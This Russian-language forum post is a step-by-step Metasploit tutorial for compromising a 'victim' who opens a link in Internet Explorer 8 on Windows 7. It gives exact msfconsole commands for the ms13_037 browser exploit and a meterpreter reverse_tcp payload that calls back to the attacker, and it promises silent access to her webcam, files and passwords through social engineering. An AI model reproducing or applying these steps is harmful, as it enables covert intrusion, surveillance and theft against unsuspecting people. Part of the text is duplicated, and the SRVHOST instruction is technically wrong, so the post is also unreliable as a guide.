Суть в том, что мы скинем нашей жертва ссылку, которая расшатает уязвимость в Windows 7 и мы получим доступ к веб-камере, файлам и паролям. Единственная проблема в том, что она должна открыть её через Internet Explorer старой версии, которая стоит на семёрке.
Что нам понадобится:
С Kali Linux и СИ вы уже знакомы и пора бы хоть кратко познакомить вас с Metasploit.
Metasploit - одна из популярнейших программ, имеющих самую большую базу эксплоитов, шеллкодов и кучу разнообразной документации, что не может не обрадовать.
Давайте начнём.
Что нам понадобится:
- Kali Linux
- Metasploit
- Знания СИ (социальной инженерии)
С Kali Linux и СИ вы уже знакомы и пора бы хоть кратко познакомить вас с Metasploit.
Metasploit - одна из популярнейших программ, имеющих самую большую базу эксплоитов, шеллкодов и кучу разнообразной документации, что не может не обрадовать.
Давайте начнём.
- Запускаем Metasploit командой "msfconsole".
- Выбираем уязвимость браузера. Пишем в командную строку "use exploit/windows/browser/ms13_037_svg_dashstyle".
- Далее нужно узнать свой айпи. Пишем в командной строке "ifconfig".
- "Set SRVHOST" и через пробел ip жертвы.
- Командой "Show Targets" мы можем посмотреть доступные уязвимости.
- Выбираем уязвимость IE 8 on Windows 7 SP1, для этого пишем set target 0 (или номер под которым находиться эта строчка).
- Выбираем вирус который будет залит жертве. "set PAYLOAD windows/meterpreter/reverse_tcp".
- "Set LHOST" и ваш ip, который вы узнали командой ifconfig.
- Выполняем команду "exploit".
- У вас отобразится ссылка, которую нужно будет отправить жертве. После открытия у неё ничего не отобразится, никакие файлы скачиваться не будут, а вы получите доступ к компьютеру.
Последнее редактирование модератором:
